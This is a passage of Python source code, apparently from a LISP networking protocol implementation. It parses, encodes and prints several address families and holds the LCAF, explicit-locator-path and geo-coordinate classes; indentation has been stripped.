#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = ""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += self.address + "\0"
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid is 0 and mask_len is 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
